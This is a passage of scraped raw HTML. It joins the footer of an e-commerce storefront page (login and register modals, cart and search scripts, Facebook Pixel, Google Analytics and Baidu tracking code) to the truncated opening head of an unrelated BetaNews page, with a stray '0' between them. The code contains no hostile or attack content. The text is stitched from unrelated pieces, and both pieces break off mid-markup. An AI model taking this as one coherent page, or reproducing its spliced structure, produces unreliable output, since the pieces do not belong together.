id="subscriptionFormJump" role="flform" action="/site/add-subscripter.html" afterSubmit="ajaxAfterSubscriptionSubmitJump" > <input type="text" name="email" id="subscriptUserEmailJump" placeholder="Your email address"/> </form> <button type="submit" id="subscriptionBtnJump" style="text-transform: capitalize;">Subscribe</button> </div> </div> <!--account area end--> </div> </div> </div> </div> <!--注册登录弹框--> <a href="" class="theme-button registerLoginModelClick" data-toggle="modal" data-target="#loginModal" style="display:none;"></a> <div class="modal fade" id="loginModal" tabindex="-1" role="dialog"> <div class="modal-dialog hhg-scrollbar" role="document" > <div class="modal-content"> <!--account area start--> <div class="login-win-box row"> <div class="login-win login-o-o animated col-sm-6" > <a class="diolog-register-a diolog-register"> <span>Register</span></a> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button> <h3 class="title">Login</h3> <p style="display:none;" class="login-tips" id="loginerrorbox"></p> <form id="loginModelForm"> <input type="text" name="username" placeholder="Email Address" /> <input type="password" name="password" placeholder="Password" /> <p class="verification_code"> <input type="text" name="verifyCode" placeholder="Verification Code"> <span> <a href="javascript:;" class="cade_img" id="refreshCapchBtn"> <img style="cursor:pointer;width:105px;height:40px;" src="/site/captcha.html"> </a> </span> </p> <p> <a href="/site/forget-password.html">Forgot your password?</a> </p> <p class="buttons-group"> <input type="submit" value="Login" name="login" class="theme-button marL0 btn-block"> </p> </form> <div class="third-or"> <span>OR</span> </div> <ul class="thirder"> <li><a href="javascript:" class="thirder-1 facebookLogin"><img src="/statics/share_icons/Facebook.png"></a></li> <li><a href="javascript:" class="thirder-1 twitterLogin"><img src="/statics/share_icons/Twitter.png"></a></li> <li><a href="javascript:" class="thirder-1 googleLogin"><img src="/statics/share_icons/Google+.png"></a></li> <li><a href="javascript:" class="thirder-1 linkedinLogin"><img src="/statics/share_icons/LinkedIn.png"></a></li> </ul> <form class="facebookLoginForm" role="flform" action="/site/facebook-login.html" afterSubmit="ajaxAfterSubmit" target="_blank"></form> <form class="twitterLoginForm" role="flform" action="/site/twitter-login.html" afterSubmit="ajaxAfterSubmit" target="_blank"></form> <form class="googleLoginForm" role="flform" action="/site/google-login.html" afterSubmit="ajaxAfterSubmit" target="_blank"></form> <form class="linkedinLoginForm" role="flform" action="/site/linkedin-login.html" afterSubmit="ajaxAfterSubmit" target="_blank"></form> </div> <div class="login-win register-o-o animated active col-sm-6" > <a class="diolog-login-a diolog-register"> <span>Login</span></a> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button> <h3 class="title">Register</h3> <p style="display:none;" class="login-tips" id="regerrorbox"></p> <form id='registerModelForm'> <input type="text" placeholder="Email Address" name="reg_username"/> <input type="password" placeholder="Password" name="reg_password" /> <input type="password" placeholder="confirm your password" name="reg_confirmPassword"/> <p class="verification_code"> <input type="text" name="reg_verifyCode" placeholder="Verification Code"> <span> <a href="javascript:;" class="cade_img" id="reg_refreshCapchBtn"> <img style="cursor:pointer;width:105px;height:40px;" src="/site/captcha.html"> </a> </span> </p> <p class="buttons-group"> <input type="submit" value="Register" name="register" class="theme-button marL0 btn-block"> </p> </form> <div class="third-or"> <i class="cell"></i><span>OR</span><i class="cell"></i> </div> <ul class="thirder"> <li><a href="javascript:" class="thirder-1 facebookLogin"><img src="/statics/share_icons/Facebook.png"></a></li> <li><a href="javascript:" class="thirder-1 twitterLogin"><img src="/statics/share_icons/Twitter.png"></a></li> <li><a href="javascript:" class="thirder-1 googleLogin"><img src="/statics/share_icons/Google+.png"></a></li> <li><a href="javascript:" class="thirder-1 linkedinLogin"><img src="/statics/share_icons/LinkedIn.png"></a></li> </ul> <form class="facebookLoginForm" role="flform" action="/site/facebook-login.html" afterSubmit="ajaxAfterSubmit" target="_blank"></form> <form class="twitterLoginForm" role="flform" action="/site/twitter-login.html" afterSubmit="ajaxAfterSubmit" target="_blank"></form> <form class="googleLoginForm" role="flform" action="/site/google-login.html" afterSubmit="ajaxAfterSubmit" target="_blank"></form> <form class="linkedinLoginForm" role="flform" action="/site/linkedin-login.html" afterSubmit="ajaxAfterSubmit" target="_blank"></form> <div class="clearfix"></div> </div> <div class="login-img-box col-sm-6"><a href="https://www.baidu.com" target="_blank"><img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/15/154752030488824.jpg" class="img-responsive" alt=""/></a></div> </div> <!--account area end--> </div> </div> </div> <!--首页倒计时广告位--> <!--首页倒计时广告位--> <!-- 开通网站导航条 start --> <!-- 开通网站导航条 end --> <!--加载等待--> <div id="lkcPreloader" style="display:none;"> <div id="status" class=""> <i class="fa fa-spinner fa-spin"></i> </div> </div> <!--加载等待 end--> <div class="modal fade" id="alertContent" > <div class="modal-dialog hhg-scrollbar" role="document"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true"><i class="fa fa-close"></i></span></button> <h4 class="modal-title" id="exampleModalLabel">Message prompt</h4> </div> <div class="modal-body"> </div> <div class="modal-footer"> <button type="button" class="btn btn-default alertContentRefresh2Button" data-dismiss="modal">OK</button> </div> </div> </div> </div> <div class="modal fade" id="addCardSuccessMotal" > <div class="modal-dialog hhg-scrollbar" role="document"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true"><i class="fa fa-close"></i></span></button> <h4 class="modal-title" id="exampleModalLabel">Message prompt</h4> </div> <div class="modal-body"> <div>Successfully joined the shopping cart</div><br/> <a class="btn btn-default" href="/cart/detail.html" role="button">Go shopping cart</a> <a class="btn btn-default _continue" href="javascript:;" role="button">Continue</a> </div> </div> </div> </div> <div class="modal fade" id="inquerySuccessMotal" > <div class="modal-dialog hhg-scrollbar" role="document"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true"><i class="fa fa-close"></i></span></button> <h4 class="modal-title" id="exampleModalLabel">Message prompt</h4> </div> <div class="modal-body"> <div>Join inquiry successfully</div><br/> <a class="btn btn-default" href="/inquery/detail.html" role="button">Inquiry now</a> <a class="btn btn-default _continue" href="javascript:;" role="button">Continue Inquiry</a> </div> </div> </div> </div> <div class="modal fade" id="addToWishlistSuccessMotal" > <div class="modal-dialog hhg-scrollbar" role="document"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true"><i class="fa fa-close"></i></span></button> <h4 class="modal-title" id="exampleModalLabel">Message prompt</h4> </div> <div class="modal-body"> <div>The items has been successfully added to the wishlist!</div><br/> <a class="btn btn-default" href="/center/default/wishlist.html" role="button">View wishlist</a> <a class="btn btn-default _continue" href="javascript:;" role="button">OK</a> </div> </div> </div> </div> <div class="modal fade" id="addToAffiliateSuccessMotal" > <div class="modal-dialog hhg-scrollbar" role="document"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button> <h4 class="modal-title" id="exampleModalLabel">Message prompt</h4> </div> <div class="modal-body"> <div>Congratulations to you! The exclusive link has been saved to your "Distribution Products" menu, you can share this exclusive links to your friends. When your friends buys the product through your shared link, you can get a commission from the seller!</div> <br/><a class="btn btn-default" href="/center/affiliate/index.html" role="button">View My Distribution Products</a> <a class="btn btn-default _continue" href="javascript:;" role="button">OK</a> </div> </div> </div> </div> <div class="modal fade" id="c_loading" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel"> <div class="modal-dialog hhg-scrollbar" role="document"> <div class="modal-content"> <div class="modal-body"> <div class="loadingshow">sss</div> </div> </div> </div> </div> <div id="shortTip"></div> <link rel="stylesheet" href="https://www.worldtvmall.com/statics/plugins/ladda/ladda-themeless.min.css"> <!-- jquery latest version --> <script src="https://www.worldtvmall.com/statics/themes/base/js/vendor/jquery-1.12.0.min.js"></script> <script src="https://www.worldtvmall.com/statics/themes/base/js/amazeui.min.js" type="text/javascript" charset="utf-8"></script> <!-- Bootstrap framework js --> <script src="https://www.worldtvmall.com/statics/themes/base/js/js.js" type="text/javascript" charset="utf-8"></script> <script src="https://www.worldtvmall.com/statics/themes/base/js/bootstrap.min.js"></script> <script src="https://www.worldtvmall.com/statics/ext/bootstrap3-dialog/js/bootstrap-dialog.js"></script> <script src="https://www.worldtvmall.com/statics/js/jquery.form.js"></script> <script src="https://www.worldtvmall.com/statics/brba/js/jquery.cookies.js"></script> <!--uikit--> <script src="https://www.worldtvmall.com/statics/plugins/uikit/js/uikit.min.js"></script> <script src="https://www.worldtvmall.com/statics/plugins/uikit/js/components/slideshow.min.js"></script> <!-- ajax-mail js --> <script src="https://www.worldtvmall.com/statics/themes/base/js/ajax-mail.js"></script> <!-- jquery.nivo.slider js --> <script src="https://www.worldtvmall.com/statics/themes/base/js/jquery.nivo.slider.pack.js"></script> <!-- All js plugins included in this file. --> <script src="https://www.worldtvmall.com/statics/themes/base/js/plugins.js"></script> <!-- Main js file that contents all jQuery plugins activation. --> <script src="https://www.worldtvmall.com/statics/themes/base/js/main.js"></script> <script src="https://www.worldtvmall.com/statics/themes/base/js/common.lib.js"></script> <script src="https://www.worldtvmall.com/statics/plugins/ladda/spin.min.js"></script> <script src="https://www.worldtvmall.com/statics/plugins/ladda/ladda.min.js"></script> <script src="https://www.worldtvmall.com/statics/plugins/ladda/ladda.jquery.min.js"></script> <script src="https://www.worldtvmall.com/statics/js/visitor.js"></script> <!-- share js start --> <script type="text/javascript">var addthis_config = {"data_track_addressbar":false};</script> <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5919976d9ac2f820" async="async"></script> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '302895800362342'); // Insert your pixel ID here. fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=302895800362342&ev=PageView&noscript=1" /></noscript> <!-- DO NOT MODIFY --> <!-- End Facebook Pixel Code --> <input id="FrontNowCurrency" type="hidden" value="USD"> <script> /** * 开放给各个点调用 * USD 为各国的币种缩写 * eg: * FacebookPixel.Search('搜索的内容'); //该事件发生在用户搜索完成页面,这里主要是指商品搜索结果展示页。--完成 * FacebookPixel.ViewContent(3.5,'USD'); //该事件发生用户浏览商品详情页时,单位为可选参数,不填则默认为系统的币种 -- 完成 * FacebookPixel.AddToCart(3.5,'USD'); //该事件发生在用户,把某个商品添加入购买车时发生。 --- 完成 * FacebookPixel.AddToWishlist(3.5,'RMB') //该事件发生在用户,把某个商品添加入心愿单时发生。--- 完成 * FacebookPixel.InitiateCheckout();//该事件发生在用户进入结账流程时。--- 完成 * FacebookPixel.AddPaymentInfo(); //该事件发生在用户添加支付信息时发生。 * FacebookPixel.Purchase(3.5,'RMB');//该事件发生在订单确认时。;--- 完成 * FacebookPixel.Lead();//该事件发生在”提交订阅时“;--- 完成 * FacebookPixel.CompleteRegistration(); //该事件发生在用户填写完成注册信息,点击提交时发生。--- 完成 * FacebookPixel.JumpToThirdPlat(); //该事件发生在用户在产品详细页点击第三方平台链接时发生。--- 完成 * FacebookPixel.OnlinePayComplete(); //该事件发生在用户在线支付完成后,跳转到支付完成页面时发生。--- 完成 */ var FacebookPixel = { intIsOpen:1, //搜索 Search:function(searchContent){ //searchContent 搜索的内容 if (FacebookPixel.intIsOpen) { fbq('track', 'Search', {search_string: searchContent}); } }, //查看内 ViewContent:function(price, currency) { //price 单价,价格,currency货币单位,可选参数 var strCurrencyDefault = $('#FrontNowCurrency').val(); if (currency == undefined) currency = strCurrencyDefault; if (FacebookPixel.intIsOpen) { fbq('track', 'ViewContent', {value: price,currency: currency}); } }, //加入购物车 AddToCart:function(price, currency){ var strCurrencyDefault = $('#FrontNowCurrency').val(); if (currency == undefined) currency = strCurrencyDefault; if (FacebookPixel.intIsOpen) { fbq('track', 'AddToCart', {value: price,currency: currency}); } }, //加入心愿单 AddToWishlist:function(price, currency) { var strCurrencyDefault = $('#FrontNowCurrency').val(); if (currency == undefined) currency = strCurrencyDefault; if (FacebookPixel.intIsOpen) { fbq('track', 'AddToWishlist', {value: price,currency: currency}); } }, //发起结账 InitiateCheckout:function(){ if (FacebookPixel.intIsOpen) { fbq('track', 'InitiateCheckout'); } }, //添加支付信息 AddPaymentInfo:function(){ if (FacebookPixel.intIsOpen) { fbq('track', 'AddPaymentInfo'); } }, //购买 Purchase:function(price, currency){ var strCurrencyDefault = $('#FrontNowCurrency').val(); if (currency == undefined) currency = strCurrencyDefault; if (FacebookPixel.intIsOpen) { fbq('track', 'Purchase', {value: price,currency: currency}); } }, //潜在客户 Lead:function(){ if (FacebookPixel.intIsOpen) { fbq('track', 'Lead'); } }, //完成注册 CompleteRegistration:function(){ if (FacebookPixel.intIsOpen) { fbq('track', 'CompleteRegistration'); } }, //跳转至第三方平台 JumpToThirdPlat:function(){ if (FacebookPixel.intIsOpen) { fbq('track', 'JumpToThirdPlat'); } }, OnlinePayComplete:function(){ if (FacebookPixel.intIsOpen) { fbq('track', 'OnlinePayComplete'); } } } </script> <!--倒计时开始--> <!--倒计时结束--> <script type="text/javascript"> /*addthis.share({ container_selector: '.addthis_share', button_selector: '.addthis_share_button', click: addthisshareclick(), close: addthisshareclose(), }); function addthisshareclick(){ alert(111) } function addthisshareclose(){ alert(222) }*/ var common_mutilang_var = {}; common_mutilang_var.alert_confim_title = "Message prompt"; common_mutilang_var.alert_confim_msg = "Confirm operation?"; common_mutilang_var.alert_confim_ok = "OK"; common_mutilang_var.alert_confim_cancel = "cancel"; // 开通网站导航条 start setTimeout(function(){ $('#probation-fixed').css('bottom', '0') }, 5000) $('#probation-fixed .fa-close').on('click', function(){ $('#probation-fixed').css('bottom', '-60px') }) // 开通网站导航条 end // 首页倒计时 $('#countdown i.fa').on('click', function(){ $('#countdown').hide(); }) </script> <!-- share js end --> <script type="text/javascript"> var bset_switch_allow_cart = parseInt('1'); if(!bset_switch_allow_cart){ $('#Header_cartBox').hide(); $('#Header_cartBox2').hide(); $('#Header_cartBox3').hide(); } </script> <script type="text/javascript"> //全局配置 var WebGloablConfig = { "addCardUrl":"/cart/add.html", "inquery":"/inquery/add.html", "addToWishlist":"/wishlist/add-to-wishlist.html", "createCheckoutRidUrl":"/order/create-checkout-rid.html", "addAffiliateProLink":"/affiliate/create-affiliate-user-pro-link.html" } var bset_google_gtm_id = 'GTM-MCLKLFF'; </script> <script async src="https://www.googletagmanager.com/gtag/js?id=GA_TRACKING_ID"></script> <script> //谷歌分析 var str = 'UA-131757971-1'; var str2 = ''; (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', str, 'auto'); ga('create', str2, 'auto','clientTracker'); ga('send', 'pageview'); ga('clientTracker.send', 'pageview'); </script> <script> //百度统计 var str = ''; var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?"+str; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script type="text/javascript"> //访客统计 var url = '/visitor/index.html'; var sourceUrl = document.referrer; //console.log('data='+sourceUrl); var sourceKey = ''; $.getJSON(url,{'sourceUrl':sourceUrl,'sourceKey':sourceKey},function(data){ }) </script> <script src="/statics/themes/zhuoyuechuangxin/js/owl.carousel.min.js"></script> <script src="/statics/js/vue.min.js"></script> <script type="text/javascript"> function headerBoxBeforeSubmit(){ return true; } function headerBoxAfterSubmit(data){ if(data.status==1){ CartVueObj.getData(); return ; } var msg = data.msg || "error"; FLFunctions.alertConent(msg); } //购物车 var indata = {} indata.list = []; var CartVueObj = new Vue({ el:"#Header_cartBox", data:indata, methods:{ "getData":function(){ var thisbob = this; $.get("/cart/get-list.html",{},function(data){ thisbob.list = data; },"json") }, "delete2":function(event){ var productItemId = $(event.target).attr("data-productItemId"); $("#headerDeleteForm input[name=\"productItemId\"]").val(productItemId); FLFunctions.confirm(function(){ $("#headerDeleteForm").submit(); }) }, checkout:function(){ var itemList = []; for(var i in this.list){ itemList.push({ "productItemId":this.list[i].productItemId, "quantity":this.list[i].quantity }) } FLCheckout.create(itemList) } }, computed:{ count:function(){ return this.list.length; } } }) $(function(){ //购物车事件 FLCart.onAddCartAfterEvent(function(){ CartVueObj.getData(); }) CartVueObj.getData(); }) $(function(){ //货币切换 $(".cCurrencySelectItem").bind("click",function(){ var code = $(this).attr("data-code"); var sign = $(this).attr("data-sign"); $.cookie("nowCurrency", code,{ expires: 1, path: '/' }); location.reload(); }) }) $(function(){ //搜索box var SearchObjBox = function(){ var indata = {} indata.productList = []; indata.wd = "" indata.lock = 0; var searchObjBox = new Vue({ el:"#searchProductWidget", data:indata, methods:{ getList:function(){ var thisobj = this; if(this.lock>0){ this.lock++ return false; } this.lock++ $.get("/products/get-search-product-list.html",{"wd":this.wd},function(data){ var list = data || []; thisobj.productList = list; if(thisobj.lock>1){ thisobj.lock = 0; thisobj.getList(); } thisobj.lock = 0; },"json") } }, watch:{ wd:function(){ this.getList(); } } }) return searchObjBox; }() }) $(function(){ function bannerLoadingHide(){ $('.banner-box .banner-loading').css('display', 'none'); $('.banner-box').css('height', 'auto'); $('.zhuoyuechuangxin .banner .uk-dotnav').css({ 'visibility': 'visible', 'opacity': '1' }); } // banner loading if( $('.banner-box .banner').length != 0 ){ if( $('.banner-box .banner .uk-slideshow li').length == 0 ){ bannerLoadingHide(); }else{ // 如果第一个轮播位置是视频 if( $('.banner-box .banner .uk-slideshow li').eq(0).find('a').find('video').length ){ bannerLoadingHide(); }else{ var imgLoad = $('.banner-box .uk-slideshow>li').eq(0).find('img'); var imgHeight = imgLoad.height(); $('.banner-box').css('height', imgHeight) imgLoad.one('load', function(){ bannerLoadingHide(); }).each(function() { if(this.complete){ setTimeout(function(){ bannerLoadingHide(); }, 800) } }); } } } $('.header .fa-reorder').click(function(e){ e.stopPropagation(); $('.head-center').addClass('active'); $('.head-bg').addClass('active'); }) $('.head-center').click(function(e){ e.stopPropagation(); }) $(document).click(function(e){ e.stopPropagation(); $('.head-center').removeClass('active'); $('.head-bg').removeClass('active'); }) $('.head-center .dropdown .btn').click(function(){ $(this).siblings().slideToggle() }) // 导航 $(window).scroll(function(){ if( $(window).scrollTop() > 40 ){ $('.header .head-nav .scroll-box').addClass('scrollTop') }else{ $('.header .head-nav .scroll-box').removeClass('scrollTop') } }); $('#owl-demo').owlCarousel({ pagination: true, navigation: false, items: 4, autoPlay: false }); $('#owl-demo2').owlCarousel({ pagination: false, navigation: true, items: 4, autoPlay: true, navigationText: ['<i class="fa fa-chevron-left"></i>', '<i class="fa fa-chevron-right"></i>'] }); $('.ad-content-list').owlCarousel({ pagination: true, navigation: false, items: 6, autoPlay: false }); $('#owl-demo3').owlCarousel({ pagination: false, navigation: false, items: 1, autoPlay: true }); $('.ad .ad-content .ad-content-box .ad-content-list').hide(); $('.ad .ad-content .ad-content-box').eq(0).find('.ad-content-description p').eq(0).show(); $('.ad .ad-content .ad-content-box').eq(0).find('.ad-content-classify li').eq(0).addClass('active'); $('.ad .ad-content .ad-content-box .ad-content-list-box .ad-content-list').first().show(); $('.ad .ad-head .ad-head-category .img-box img.img-default').show() $('.ad .ad-head .ad-head-category.active .img-box img.img-active').show() $('.ad .ad-head .ad-head-category.active .img-box img.img-default').hide() $('.ad .ad-content .ad-content-box .ad-content-classify li').on('click', function(){ var _this = $(this).index(); $(this).addClass('active').siblings().removeClass('active'); $(this).parent().siblings('.ad-content-list-box').find('.ad-content-list').hide(); $(this).parent().siblings('.ad-content-list-box').find('.ad-content-list').eq(_this).fadeIn() $(this).parent().siblings('.ad-content-description').find('p').hide(); $(this).parent().siblings('.ad-content-description').find('p').eq(_this).fadeIn() }) $('.ad .ad-head .ad-head-category').on('click', function(){ $(this).siblings('.ad-head-category').find('img').hide().siblings('.img-default').show(); $(this).find('.img-default').hide(); $(this).find('.img-active').show(); $(this).addClass('active').siblings().removeClass('active'); var _this = $(this).index(); var $box = $('.ad .ad-content .ad-content-box'); $box.hide().eq(_this).fadeIn();; $box.find('.ad-content-list').hide(); $box.find('.ad-content-classify li').removeClass('active') $box.eq(_this).find('.ad-content-classify li').eq(0).addClass('active'); $box.find('.ad-content-description p').hide(); $box.eq(_this).find('.ad-content-description p').eq(0).fadeIn(); $box.find('.ad-content-list-box').eq(_this).find('.ad-content-list').eq(0).fadeIn() }) }) function ajaxAfterSubscriptionSubmit(data){ if(data.status==1){ FLFunctions.alertConent('Successful operation'); }else{ FLFunctions.alertConent(data.msg==""?"操作失败":data.msg); } } $('#subscriptionBtn').bind('click',function(){ var email = $('#subscriptUserEmail').val(); var myreg = /^([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+@([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+\.[a-zA-Z]{2,3}$/; if(!myreg.test(email)){ FLFunctions.alertConent('username must be an email!'); return false; } FacebookPixel.Lead() $("#subscriptionForm").submit(); }); var isDisplayLoginForm = '2'; var userId = ''; var registerLoginModelClickCookie = $.cookie('registerLoginModelClickCookie'); var subscibeModelClickCookie = $.cookie('subscibeModelClickCookie'); var route = 'site/index'; //纯广告弹框 if(isDisplayLoginForm==1 && route!='site/login' && route!='site/register' && registerLoginModelClickCookie!=1){ //后台允许弹出,没有弹出过 $('.adsenseJumpFormModelClick').click(); $.cookie('registerLoginModelClickCookie', '1'); } $('.vedio-dialog .fa-close').click(function(){ $('#adsenseJumpFormModal').modal('hide'); }) //订阅弹框 if(isDisplayLoginForm==3 && route!='site/login' && route!='site/register' && subscibeModelClickCookie!=1){ //后台允许弹出,没有弹出过,当前没有登录 $('.subscibeJumpFormModelClick').click(); $.cookie('subscibeModelClickCookie', '1'); } $('.subscribe-dialog .fa-close').click(function(){ $('#subscibeJumpModal').modal('hide'); }) function ajaxAfterSubscriptionSubmitJump(data){ if(data.status==1){ FLFunctions.alertConent('Successful operation'); $('#subscibeJumpModal').modal('hide'); }else{ FLFunctions.alertConent(data.msg==""?"操作失败":data.msg); } } $('#subscriptionBtnJump').bind('click',function(){ var email = $('#subscriptUserEmailJump').val(); var myreg = /^([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+@([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+\.[a-zA-Z]{2,3}$/; if(!myreg.test(email)){ FLFunctions.alertConent('Please fill in the correct format of email!'); return false; } FacebookPixel.Lead() $("#subscriptionFormJump").submit(); }); function ajaxAfterSubmit(data){ if(data.status==1){ window.location.href = data.data.url; }else{ FLFunctions.alertConent(data.msg==""?"操作失败":data.msg); } } $('.facebookLogin').bind('click',function(){ $(".facebookLoginForm").submit(); }); $('.twitterLogin').bind('click',function(){ $(".twitterLoginForm").submit(); }); $('.googleLogin').bind('click',function(){ $(".googleLoginForm").submit(); }); $('.linkedinLogin').bind('click',function(){ $(".linkedinLoginForm").submit(); }); //登录弹框自动弹出 var isDisplayLoginForm = '2'; var userId = ''; var registerLoginModelClickCookie = $.cookie('registerLoginModelClickCookie'); var route = 'site/index'; if(isDisplayLoginForm==0 && route!='site/login' && route!='site/register' && registerLoginModelClickCookie!=1 && userId==''){ //后台允许弹出,没有弹出过,当前没有登录 $('.registerLoginModelClick').click(); $.cookie('registerLoginModelClickCookie', '1'); } $(function(){ var lock = 0; $("#loginModelForm").submit(function(){ if(lock==1){ return false; } lock = 1; var username = $("#loginModelForm input[name=\"username\"]").val(); var password = $("#loginModelForm input[name=\"password\"]").val(); var verifyCode = $("#loginModelForm input[name=\"verifyCode\"]").val(); $.post("/login.html",{"username":username,"password":password,"verifyCode":verifyCode},function(data){ lock = 0; var status = data.status || -1; if(status==1){ //成功 location.reload(); return ; } //失败 var msg = data.msg || "error"; FLFunctions.alertConent(msg); refreshCapch(); },"json"); return false; }) $("#registerModelForm").submit(function(){ if(lock==1){ //return false; } lock = 1; var nickname = $("#registerModelForm input[name=\"reg_nickname\"]").val(); var tel = $("#registerModelForm input[name=\"reg_tel\"]").val(); var username = $("#registerModelForm input[name=\"reg_username\"]").val(); var password = $("#registerModelForm input[name=\"reg_password\"]").val(); var confirmPassword = $("#registerModelForm input[name=\"reg_confirmPassword\"]").val(); var verifyCode = $("#registerModelForm input[name=\"reg_verifyCode\"]").val(); var myreg = /^([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+@([a-zA-Z0-9]+[_|\_|\.]?)*[a-zA-Z0-9]+\.[a-zA-Z]{2,3}$/; if(!myreg.test(username)){ FLFunctions.alertConent('username must be an email!'); return false; } if(password!=confirmPassword){ FLFunctions.alertConent('password and confirm Password is different!'); return false; } $.post("/register.html",{"nickname":nickname,"tel":tel,"username":username,"password":password,"confirmPassword":confirmPassword,"verifyCode":verifyCode},function(data){ lock = 0; var status = data.status || -1; if(status==1){ //成功 FLFunctions.alertConent('success!'); location.reload(); return ; } //失败 var msg = data.msg || "error"; FLFunctions.alertConent(msg); reg_refreshCapch(); },"json"); return false; }) $("#refreshCapchBtn").bind("click",function(){ refreshCapch(); }) $("#reg_refreshCapchBtn").bind("click",function(){ reg_refreshCapch(); }) function refreshCapch(){ $.get("/site/captcha.html?refresh=1",{},function(data){ $("#refreshCapchBtn img").attr("src",data.url); },"json") } function reg_refreshCapch(){ $.get("/site/captcha.html?refresh=1",{},function(data){ $("#reg_refreshCapchBtn img").attr("src",data.url); },"json") } }) </script> </body> </html>
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="//www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="https://www.facebook.com/2008/fbml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Technology News and Analysis - BetaNews</title> <link rel="profile" href="//gmpg.org/xfn/11" /> <link rel="stylesheet" type="text/css" media="all" href="https://betanews.com/wp-content/themes/betanews/main.css" /> <link rel="shortcut icon" href="https://betanews.com/wp-content/themes/betanews/favicon.ico" /> <link rel="pingback" href="https://betanews.com/xmlrpc.php" /> <meta property="fb:page_id" content="167777169963870" /> <meta property="og:title" content="BetaNews"/> <meta property="og:type" content="website"/> <meta property="og:url" content="https://betanews.com"/> <meta property="og:image" content="https://betanews.com/wp-content/themes/betanews/images/small_bn_logo.png"/> <meta property="og:site_name" content="BetaNews"/> <meta property="og:description" content="BetaNews is a leading source of technology news and analysis."/> <meta name="description" content="BetaNews is a leading source of technology news and analysis"/> <meta name="keywords" content="technology, tech, news, enterprise, beta, software, apps, computing, internet"/> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-135797-1', 'auto'); ga('send', 'pageview'); </script> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="BetaNews &raquo; Feed" href="https://betanews.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="BetaNews &raquo; Comments Feed" href="https://betanews.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/betanews.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.6"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var 